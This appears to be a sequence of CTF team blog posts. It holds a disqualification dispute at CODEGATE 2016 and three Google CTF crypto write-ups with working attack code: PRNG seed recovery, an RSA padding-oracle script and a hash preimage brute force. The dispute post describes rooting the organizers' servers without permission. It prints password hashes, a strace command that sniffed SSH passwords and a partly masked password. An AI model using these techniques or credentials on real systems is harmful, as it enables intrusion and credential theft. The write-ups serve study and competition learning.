One interesting thing is that the success probability of the described LSB oracle depends on $N$ strongly. For some $N$ it is equal 50% and for some $N$ it is only about 10%. This happens due to different carry chances depending the middle bits of $N$. Have a look at @carllondahl's writeup, where he investigates more cases for the oracle.

CODEGATEgate

snk — Sat, 07 May 2016 01:51:01 +0000

Final Scoreboard as captured by manhluat (l4w)

TL;DR

CTF team LC↯BC has been banned and stripped of the first place at CODEGATE CTF 2016 Finals.

The fact has been announced after competition ended and even after they announced the winners. Disqualification decision was made in the most unprofessional and biased way possible, and the CTF organizers (Black Perl Security) and CODEGATE ignore our emails starting this week, so we are making it public to avoid gossip and speculation.

Also, there is a bit of technical details.

Timeline

1. PPP 3570 2. LC↯BC 3440 3. 0daysober 2658
30 min before the end of CTF, we hold second place behind PPP. Distance to the first place is couple hundred points: we need any of the two remaining challenges to make it to the top.

T−10min. We submit hulkbox challenge to the gameboard, getting 1st.
1. LC↯BC 3761 2. PPP 3570 3. 0daysober 2658

T−9min. CTF organizers’ team leader starts to demand aggressively to show him the exploit for the challenge. Task was pwned by one of us who couldn’t make it to Korea and was swapped with someone who could; the guy is asleep in Russia at the moment when the flag has been submitted (3:50 a.m. in UTC+3 timezone), so we propose to show orgs the exploit later once he’s up.

T=. CTF ends, organizers announce the winners. Press begins to interview us.

T+15min. Organizers interrupt the press session, make everyone leave except the teams. It is announced that one of teams was using remote assistance during the competition. A poll is thrown whether remote help is good or bad. “It’s good” 3 : 7 “it’s bad”

T+20min. It’s announced that LC↯BC is disqualified. Scoreboard shifts one row up. We ask why did we get disqualified. — Remote assistance. — But it’s not in the rules?? — It’s not in the rules, and you’re disqualified.
1. PPP 3570 2. 0daysober 2658 3. 217 2632

T+30min. Orgas announce the winners: PPP, 0daysober, 217.

T+4days. None of our emails to either CODEGATE or CTF orgas get answered.

Fun bits

Rules don’t mention anything regarding remote players. We will not speculate whether other teams asked their folks who couldn’t come to Seoul for help, but since the voting result was 3 : 7, this rule was not an inherent knowledge. If it is forbidden and important to the point of taking away team’s result, rules should state it openly.
The orgas team leader circled at the PPP table, talking Korean in a low voice throughout the entire game. We know that sounds stupid, but that’s at least amusing. Made us even think orgas might be biased in their decision when we surpassed PPP. Now that the orgs don’t answer our attempts to communicate, they’re clearly not cooperative to us.
Last two hours the orgas stared at our displays assertively. Apart from that it’s pretty uncomfortable and breaks the focus when you try to RE, they totally had more than enough time to tell us if they didn’t like anything about us.
Well, we pwned the infrastructure.
VMs that hosted the services were running this:
Linux codegate 4.2.0-27-generic #32~14.04.1-Ubuntu SMP Fri Jan 22 15:32:26 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
which is a quarter-year old kernel vulnerable to this unpopular local privilege escalation strategy (shoutout to halfdog.net).

We were able to get UID 0 on hackerlife and get free flag (which we didn’t submit until we pwned the challenge) as well as /etc/shadow as our trophy.
codegate:$6$keSuElh.$t/C2mXZj5dKCfOIgGB0WGgP2aq6OwfR/m0PAI1gHAoAqZMwOErpDY7jPHwferwlxd3EFjHeQLdmy5/atDbcGi.:16917:0:99999:7::: hackerlife:$6$e9i/0OiN$yGSFlCXUkSaNmZiIY6qe9Ns12fdFJ.xiEiAnsIKa6etN2StNeYIWdqN59RtXvXUI1LRBc9dUw6uzI9NZon7ox1:16922:0:99999:7::: hackerlife_pwned:$6$HGrFrh2f$kZp3WZj7T3P6BsH4hLsyQJF8SazU723xt5PTXQRvbxb9M/5i5aBHSFIl6xqgJpsMggbiHH.IvUCsciqShZqvq.:16920:0:99999:7:::

Some time later payload challenge was released, running the exact same kernel, so why not try escalating there too?
codegate:$6$keSuElh.$t/C2mXZj5dKCfOIgGB0WGgP2aq6OwfR/m0PAI1gHAoAqZMwOErpDY7jPHwferwlxd3EFjHeQLdmy5/atDbcGi.:16917:0:99999:7::: g0est:$6$zajX8vRv$pFoFz2.0WcgzVxMQrvAAKuXzq2/9h4Gx.Z5w1HLizVFNh58GirRWSvrAtvlSptbueUCoZEbAZSEMrNNdGBYdw/:16923:0:99999:7::: payload:$6$JyY8yroK$row2/e4t/cH1y9MGDNNm6Qqv6bpBFedLNuqSt1vRjEk3EtV23cxBHSqjcH6T97D4mmtArLqFfNRAFKXNUMs2P.:16923:0:99999:7:::

OK, this is interesting. codegate user has the exact same hash. Let’s attach strace to SSH server and wait for password to fly by in plaintext.
root@codegate:/# strace -ff -p 17809 -e read |& fgrep ', "\f\0\0' [pid 17865] read(6, "\f\0\0\0\21qkqojrr******lek!", 22) = 22

And yeah, it turns out that every game box does have a sudoer codegate account with the exact same password (which is qkqojrr******lek!). Game over!
After paying a friendly visit to every vulnbox and scoreboard server, we stopped wasting time on this fun “side challenge” and proceeded to play as usual.

Treat this as a fun piece.

Facts

LC↯BC had 4 people on-site and 2 remote connected via VPN.
On-site guys played 100% of the CTF time, remote guys joined and left at their leisure: no-one has free 20 hours during a workday.
LC↯BC got root privileges on every game server. No attempts were made to destabilize the infrastructure or ruin the fun of the game.
Security specialists who organize a CTF with eight-year history and 55K USD in prizes did:
- use old Linux kernel version with a public exploit available;
- use the same password for a sudo user on the entire infrastructure;
- use passwords to access the servers;
- spend their time on petty tyranny and annoying players.
Our solutions for all the tasks that we have submitted:
https://www.dropbox.com/sh/oruwb6f7v6p4pdx/AACF0EE82_cfnV-JeMQbDOlea
/home/g0est/flag_tlqkf.txt from payload vulnbox that we have not submitted:
PAYLOADISNOT_PAYLOADUNLOAD_}

Q & A

Questions related to rules of the competition:

Screenshot of the rules taken during competition

Q: Did LC↯BC submit write-up to CODEGATE organizer after the qualification?
A: Yes

Q: Did LC↯BC join both CODEGATE CTF 2016 and CODEGATE CTF Junior 2016?
A: No

Q: Did LC↯BC share the solution or key of any challenge while competition?
A: No

Q: Did LC↯BC attack operating server for everyone :)?
A: No

Q: Was there a rule effective regarding immediately showing your exploit to event organizer?
A: No

Q: Was there a rule effective regarding remote team members?
A: No

General questions

Q: Were there remote players playing for us?
A: Yes

Q: Were we warned before or during the game that remote help can lead to disqualification?
A: No

Q: Have we traded any flags with other teams or organizers?
A: Of course not!

Q: Have we compromised CTF infrastructure (server-side) ?
A: Yes

Q: Did we interfere with infrastructure in any way that ruins CTF gameplay for anyone?
A: No

Q: Did we have the ability to score every single flag available in the competition (incl. Junior CTF) ?
A: Yes

Q: Were all flags submitted to the scoreboard solved by LC↯BC in a proper way?
A: Yes

Hope this shares our vision reasonably and ends any rumors and conjectures about what happened to our team in Seoul this year. We’d like to add that CODEGATE organizers were friendly and helpful every year (we’re visiting the event for 6th year in a row), and hope to hear their vision of current situation.

Current stance of the orgas really does surprise and irritate us and makes us wonder what to expect from future CODEGATEs.

Guys, please don’t hide. We’re up to discuss it peacefully.

Google CTF – Woodman (Crypto 100)

hellman — Tue, 03 May 2016 19:06:13 +0000

How honest are you?

Running here

Summary: breaking a weak PRNG

On the main page we see the text:

You are coming back home from a hard day sieving numbers at the river.
Unfortunately, you trip and all your numbers fall in a nearby lake.

Continue.

We click Continue and then:

From the lake a god emerged carrying a number on each hand.
He looked at you and asked the following question…

Continue.

Again, click Continue:

Did you drop 4452678531 or 754311689?

If we enter one of the numbers, we either get another question or start from the beginning. So it seems that we need to guess the correct numbers many times.

The numbers look random and the challenge looks like pure guessing. But after looking around, we can find a snippet of code hidden in the html source of the second page. It is hidden in a html comment and padded down with 500 empty lines. Here’s the snippet:

class SecurePrng(object):
    def __init__(self):
        # generate seed with 64 bits of entropy
        self.p = 4646704883L
        self.x = random.randint(0, self.p)
        self.y = random.randint(0, self.p)

    def next(self):
        self.x = (2 * self.x + 3) % self.p
        self.y = (3 * self.y + 9) % self.p
        return (self.x ^ self.y)

It is a quite simple PRNG: it consists of two LCG combined with xor.

We can guess the first few values and then attack the PRNG to recover the seed and predict next outputs.

The simplest solution is to bruteforce all candidates for $x$, deduce $y$ as xor of PRNG output with $x$ and check if the numbers match. But I will describe another solution, which exploits the fact that the multipliers are very small (2 and 3). This solution would work for much larger $p$.

The idea is to reconstruct $x$ bit-by-bit from least significant to most significant bits. Since we also know $x \oplus y$, we immediately obtain value of the same bits of $y$. Then, to account the modulus $p$ we simply guess how many $p$ we subtract on overflow. This number is not greater the multiplier constants and since they are small, there are quite few possible values. So we compute least significant bits of $x’ = 2x + 3 – k_xP$, then we obtain least significant bits of $y’$ from known $x’ \oplus y’$ and we check if for some $k_y$ the congruence $y’ \equiv 3y + 9 -k_yP\pmod{2^t}$ works.

Note that when we guess a bit of $x$, it possible that both bit values pass the test, leading to exponential explosion. One option is to compute next values (the same LSBs) and check if they match the third generated value (and for this we need to guess the modulus reductions again). But it seems that when one of the multipliers is even, there are at most one candidate per $k_x,k_y$ guess. I haven’t proved this, just observed experimentally. So for the multipliers 2,3 it works perfectly.

Here’s POC:

import random
from itertools import product

P = 2**256 + 7
NBITS = P.bit_length()

Ax, Cx = 2, 5
Ay, Cy = 3, 7

def next(x, y):
    x = (Ax*x + Cx) % P
    y = (Ay*y + Cy) % P
    return x, y

# generate two values
X0, Y0 = random.randint(0, P-1), random.randint(0, P-1)
print "X0", hex(X0)
print "Y0", hex(Y0)
realkx = (Ax*X0 + Cx) / P
realky = (Ay*Y0 + Cy) / P
print "REAL KX KY", realkx, realky
X1, Y1 = next(X0, Y0)
X2, Y2 = next(X1, Y1)
prng = [X0 ^ Y0, X1 ^ Y1, X2 ^ Y2]

# guess modulo reductions
for kx, ky in product(range(Ax), range(Ay)):
    xs = {0}
    # go from LSB to MSB
    for b in xrange(NBITS):
        if not xs:
            break
        xs2 = set()
        mask = 2**(b+1) - 1
        mod = 2**(b+1)
        for x, bx in product(xs, range(2)):
            x |= bx << b
            y = (prng[0] ^ x) & mask
            if x >= P or y >= P:
                continue
            x1 = (Ax*x + Cx - kx * P) % mod
            y1 = (Ay*y + Cy - ky * P) % mod
            if (x1 ^ y1) & mask == prng[1] & mask:
                xs2.add(x)
        xs = xs2
    else:
        print kx, ky, ":", len(xs), "candidates"
        for x0 in xs:
            y0 = prng[0] ^ x0
            assert x0 < P
            if y0 >= P:
                continue
            x1, y1 = next(x0, y0)
            if x0 ^ y0 == prng[0] and x1 ^ y1 == prng[1]:
                print "GOOD", hex(x0), hex(y0)

The flag: CTF{_!_aRe_y0U_tH3_NSA_:-?_!_}

Google CTF – Spotted Wobbegong (Crypto 100)

hellman — Sun, 01 May 2016 19:47:18 +0000

Are you able to defeat 1024-bit RSA?

public.pem

Summary: breaking RSA with PCKS v1.5 padding and exponent 3.

On the web page we see the two options: get token and check token. It is also said the the message is encrypted using PCKS v1.5 padding. The tokens are randomized. An example token:

{"token": "226ef61c703ff633889a44becc24fce9ba196
852aab918057c30f3ca63d0c32ee43b8cec004789ef6e6f4
55f141bde90fbb0bec96583f06ea7db0948a77da4ec65f49
1456690653024c312778838e411c579f07261cd3e238fc88
36637b95d94d1eca3e1b33a061fd25683f768462c35eca44
2558c21eaa7fed42f187210ac7a"}

Let’s look at the public key:

$ openssl rsa -in publickey -pubin -text
Public-Key: (1024 bit)
Modulus:
    00:96:e0:7d:13:84:28:34:45:11:25:9c:59:13:6e:
    9b:0a:e9:f1:44:50:1e:d1:0d:e1:76:9a:53:c8:93:
    e9:6b:db:a2:6b:ce:10:48:1c:e2:1f:53:30:c4:75:
    43:61:57:47:9f:4e:c0:9f:45:45:08:1b:ca:6f:94:
    af:21:27:3c:2b:89:36:a5:f5:59:be:8f:73:9b:b9:
    99:c2:d3:72:04:ec:c4:e1:c8:cb:ba:77:43:b8:99:
    09:9b:71:3e:aa:96:14:ed:f8:c9:1f:d0:94:ce:61:
    92:11:de:f9:39:39:e2:4e:3c:ae:01:34:c7:0b:3a:
    18:d9:7b:53:e3:6c:db:3d:e5
Exponent: 3 (0x3)

1024 bit modulus and the exponent is 3, suspicious!

In brief, PKCSv1.5 is a padding for RSA encryption which looks like this:

$(00)(message\ type)(random\ bytes)(00)(message)$.

The message type is usually equal to $02$.

PKCSv1.5 is known to be vulnerable to padding oracle attacks, that is what we have here. There is a writeup on Dobbertin Challenge 2012, where the Bleichenbacher attack is used to decrypt arbitrary messages. But it seems it is quite slow here, also we don’t get the message type byte from the oracle.

Let’s encrypt some correctly padded message and see the answer from the server:

import requests
from libnum import s2n, n2s, invmod

def oracle(c):
    c = "%x" % c
    if len(c) & 1:
        c = "0" + c
    data = '{"token": "%s"}' % c
    r = requests.post("https://spotted-wobbegong.ctfcompetition.com/checktoken", data=data, verify=False)
    return r.content

N = 105949368219170569676644297776119989261727047689020303679150543602433973822995622211997257369689976874802809991413640314155194724653004419692410129247990491389423643529600372760167148548937151460112884769720131611650468716029162594828863368194056749527587059285082313899147126415401813360799509875983663185381
E = 3

m = "\x00\x02"
m = m.ljust(95, "R") + "\x00"
m = m.ljust(128, "M")
c = s2n(m)
c = pow(s2n(m), E, N)
print oracle(c)

The answer is:

{
"status": "invalid",
"decoded": "4d4d4d4d4d4d4d4d4d4d4d4d4d4d4d4d4d4d4d4d4d4d4d4d4d4d4d4d4d4d4d4d",
"message": "token is invalid"
}

If the padding is correct the server leaks the decoded message! We can exploit this to decrypt the token: we just need to find some multiplicatively related correctly padded message.

And that is quite easy: assume that the padded unknown message $m$ has some small factor, e.g. 17. Then we can multiply the ciphertext by modular inverse of $17^e$ and the respective message will be divided by 17. Afterwards, we can multiply it back but by slightly different value, e.g. 16 or 18. As a result, we have multiplied the message by a fraction $16/17$ or $18/17$. In such a way a few of the most significant bits won’t change. And the padding bytes 00 02 will stay correct. If we manage to get the middle 00 byte somewhere (it happens quite often by chance), then we can leak some part of the message. After multiplying it back by the inverse fraction, we will recover part of the original message.

Note that we can’t multiply by the inverse fraction modulo $N$, because we don’t leak the full value, e.g. we don’t leak the random bytes. But we can do it modulo a power of 2. And for this to be possible, both numerator and denominator of the fraction should be odd. So let’s assume we multiply by $19/17$.

Let $m = padding \cdot 2^k + s$, where $k$ is some integer and $s$ is the secret text smaller than $2^{k-8}$. If the described event happens, then

$$m \cdot \frac{19}{17} = \frac{19}{17} \cdot 2^k \cdot padding + \frac{19}{17} \cdot s = rand \cdot 2^t + s’$$.

We leak $s’$ and if we consider the equations modulo $2^t$, then we can multiply $s’$ by $17/19$ and recover $s \pmod{2^t}$.

Let’s try it! Here’s the code:

import json
import requests
from libnum import s2n, n2s, invmod

def oracle(c):
    c = "%x" % c
    if len(c) & 1:
        c = "0" + c
    data = '{"token": "%s"}' % c
    r = requests.post("https://spotted-wobbegong.ctfcompetition.com/checktoken", data=data, verify=False)
    return r.content

# some valid token
token = 0x876c7524d3cf53cd2169a438835c397b2b7e09b783f8b595eb75b88595dec403f10f946141f57dfdcebd330ef2f243b0b8ebbfa32958d2564fcf73768315f5e1ba73e94efd933b696e9cc30978ad73017dfc06a34ee7947cd048deea599597391794e08e43028717bf907929b9195194a2731ac6b98244a73745431398cdaf71

N = 105949368219170569676644297776119989261727047689020303679150543602433973822995622211997257369689976874802809991413640314155194724653004419692410129247990491389423643529600372760167148548937151460112884769720131611650468716029162594828863368194056749527587059285082313899147126415401813360799509875983663185381
E = 3

for d in xrange(3, 50, 2):
    c = token
    c = (c * invmod(pow(d, E, N), N)) % N
    c = (c * pow(d + 2, E, N)) % N
    res = oracle(c)
    print d, ":", res
    if "decoded" in res:
        leaked = json.loads(res)["decoded"].decode("hex")
        t = len(leaked) * 8 + 8
        mod = 2**t

        s = s2n(leaked)
        s = (s * d * invmod(d + 2, mod)) % mod
        print `n2s(s)`

Let’s run it:

$ py wu.py 
3 : {"status": "invalid", "message": "Could not decrypt token"}
5 : {"status": "invalid", "message": "Could not decrypt token"}
7 : {"status": "invalid", "message": "Could not decrypt token"}
9 : {"status": "invalid", "decoded": "be004da5a80f8a36ce85ab9be
442326d2d7d5ba6b663e0feca1da42752433759e3e083729688de33c02a3e38
a59c0550895f86fe8938f9a59ae121c2431afb03b87bf86ccd4f56505438edc
1faf9f86cc72a4313a54ffad8f15f94177580dc42c1c1c227", "message":
"token is invalid"}
't\xf8\x8b\xe2pC\xaf\x9f\xa14\x9b\xe9\x7f\x8c6)B\r\xf23\xb6\xf2
Q\xb8\x16HF\xcc ,\x08s\x1b\x00CTF{***What*happens*to*grapes*whe
n*you*step*on*them***They*wine***}'

Nice! We got the full flag: CTF{***What*happens*to*grapes*when*you*step*on*them***They*wine***}

PS: Note that the described attack does not use the fact the the exponent 3 is small. So maybe the authors expected another attack. Please let me know if you are aware of a suitable attack here which exploits the small exponent.

Google CTF – Jekyll (Crypto)

hellman — Sun, 01 May 2016 19:45:17 +0000

Can you access the admin page? You can look at the crypto here.

source.py

Summary: finding a preimage for a simple 64-bit ARX-based hash.

Here’s the code of the web server:

def jekyll32(data, seed):
    def mix(a, b, c):
        a &= 0xFFFFFFFF; b &= 0xFFFFFFFF; c &= 0xFFFFFFFF;

        a -= b+c; a &= 0xFFFFFFFF; a ^= c >> 13
        b -= c+a; b &= 0xFFFFFFFF; b ^=(a <<  8)&0xFFFFFFFF
        c -= a+b; c &= 0xFFFFFFFF; c ^= b >> 13
        a -= b+c; a &= 0xFFFFFFFF; a ^= c >> 12
        b -= c+a; b &= 0xFFFFFFFF; b ^=(a << 16)&0xFFFFFFFF
        c -= a+b; c &= 0xFFFFFFFF; c ^= b >>  5
        a -= b+c; a &= 0xFFFFFFFF; a ^= c >>  3
        b -= c+a; b &= 0xFFFFFFFF; b ^=(a << 10)&0xFFFFFFFF
        c -= a+b; c &= 0xFFFFFFFF; c ^= b >> 15

        return a, b, c

    a = 0x9e3779b9
    b = a
    c = seed
    length = len(data)

    keylen = length
    while keylen >= 12:
        values = struct.unpack('<3I', data[:12])
        a += values[0]
        b += values[1]
        c += values[2]

        a, b, c = mix(a, b, c)
        keylen -= 12
        data = data[12:]

    c += length

    data += '\x00' * (12-len(data))
    values = struct.unpack('<3I', data)

    a += values[0]
    b += values[1]
    c += values[2]

    a, b, c = mix(a, b, c)

    return c

def jekyll(data):
    return jekyll32(data, 0x60061e) | (jekyll32(data, 0x900913) << 32)

...
cookie = self.request.cookies.get('admin')
if cookie is not None and jekyll(base64.b64decode(cookie)) == 0x203b1b70cb122e29:
    self.response.write('Hello admin!\n'+FLAG)
else:
    self.response.write('Who are you?')
...

So we need to find preimage of 203b1b70cb122e29 with hash described by the jekyll function, which simply concatenates two calls to jekyll32 with different seeds.

The core of jekyll32 is the mix function. It takes three 32-bit workds and transforms them using ARX operations. Note that mix is easily invertible if we have all three values. However the jekyll32 function returns only the third value.

The message is processed in blocks of 12 bytes and is padded with at least one zero. Let's see what we can do with one block. The hash then works like this:

$$
\begin{split}
jekyll32 & (m_1 || m_2 || m_3, seed) = \\
& mix( (\text{9e3779b9},\text{9e3779b9},seed + length) + (m_1, m_2, m_3) ).
\end{split}
$$

We can set some random values to the outputs $a, b$, and invert the $mix$ function. Then, we subtract the initial constants and deduce a message which results in the given triple $a, b, c$, where $c$ is equal to the 32-bit half of the hash. Now we can change the seed and compute the hash and check if it matches the other half. That is, we need $2^{33}$ evaluations of the $mix$ function.

However, there is a problem: at least one zero byte is added, so with one block we can control only 11 bytes. That is, when we invert the $mix$ function, we don't control the least significant byte of the third word, which need to be equal to $seed + length$. Thus, we have to try $2^8$ times more. It is still doable, but takes quite a lot of time.

Let's instead consider messages with two blocks. We won't care about the second block, we will use only the fact that the first block is fully controlled by us. So we can actually let the second block be the zero pad. And the general scheme stays the same.

To sum up the attack:

let $h_1, h_2$ be 32-bit halves of the target hash;
choose random $a, b$;
compute $t = mix^{-1}(a, b, h_1)$;
subtract $length = 12$;
compute $s = mix^{-1}(t - 12)$;
deduce $m = s - (\text{9e3779b9},\text{9e3779b9},seed1)$;
check if $jekyll32(m, seed_2) == h_2$.

We will have to repeat this around $2^{32}$ times, each time we do $4$ evaluations of $mix$ or $mix^{-1}$.

Here's C++ code:

#include 
// g++ brute.cpp -O3 -std=c++11 -o brute && time ./brute

struct State {
    uint32_t a, b, c;
    void mix() {
        a -= b+c;
        a ^= c >> 13;
        b -= c+a;
        b ^= a << 8;
        c -= a+b;
        c ^= b >> 13;
        a -= b+c;
        a ^= c >> 12;
        b -= c+a;
        b ^= a << 16;
        c -= a+b;
        c ^= b >> 5;
        a -= b+c;
        a ^= c >> 3;
        b -= c+a;
        b ^= a << 10;
        c -= a+b;
        c ^= b >> 15;
    }
    void unmix() {
        c ^= b >> 15;
        c += a+b;
        b ^= a << 10;
        b += c+a;
        a ^= c >> 3;
        a += b+c;
        c ^= b >> 5;
        c += a+b;
        b ^= a << 16;
        b += c+a;
        a ^= c >> 12;
        a += b+c;
        c ^= b >> 13;
        c += a+b;
        b ^= a << 8;
        b += c+a;
        a ^= c >> 13;
        a += b+c;
    }
};

uint32_t STARTCONST = 0x9e3779b9;
uint32_t LENGTH = 12;
uint32_t SEED1 = 0x60061e;
uint32_t SEED2 = 0x900913;
uint32_t HASH1 = 0xcb122e29;
uint32_t HASH2 = 0x203b1b70;

int main() {
    for(uint64_t a = 0; a < 1ll << 32; a++) {
        if ((a & 0xffffff) == 0) {
            printf("%08x\n", a);
        }
        State s = {a, 0x31337, HASH1};
        s.unmix();
        s.c -= LENGTH;
        // subtract message, but we set it to zeroes
        // so do nothing
        s.unmix();

        uint32_t p[3];
        p[0] = s.a - STARTCONST;
        p[1] = s.b - STARTCONST;
        p[2] = s.c - SEED1;
        s.a = p[0] + STARTCONST;
        s.b = p[1] + STARTCONST;
        s.c = p[2] + SEED2;
        s.mix();
        s.c += LENGTH;
        s.mix();

        if (s.c == HASH2) {
            printf("GOOD: %08x %08x %08x\n", p[0], p[1], p[2]);
            printf("PLAIN: ");
            for(int i = 0; i < 8; i++)
                printf("%02x", (char*)p + i);
            printf("\n");
        }
    }
    return 0;
}

GOOD: 5cc80e2e e7fee109 d6d486f1
PLAIN: 2e0ec85c09e1fee7f186d4d6
2m2.185s

The flag: CTF{diD_y0u_ruN_iT_0N_Y0uR_l4PtoP?}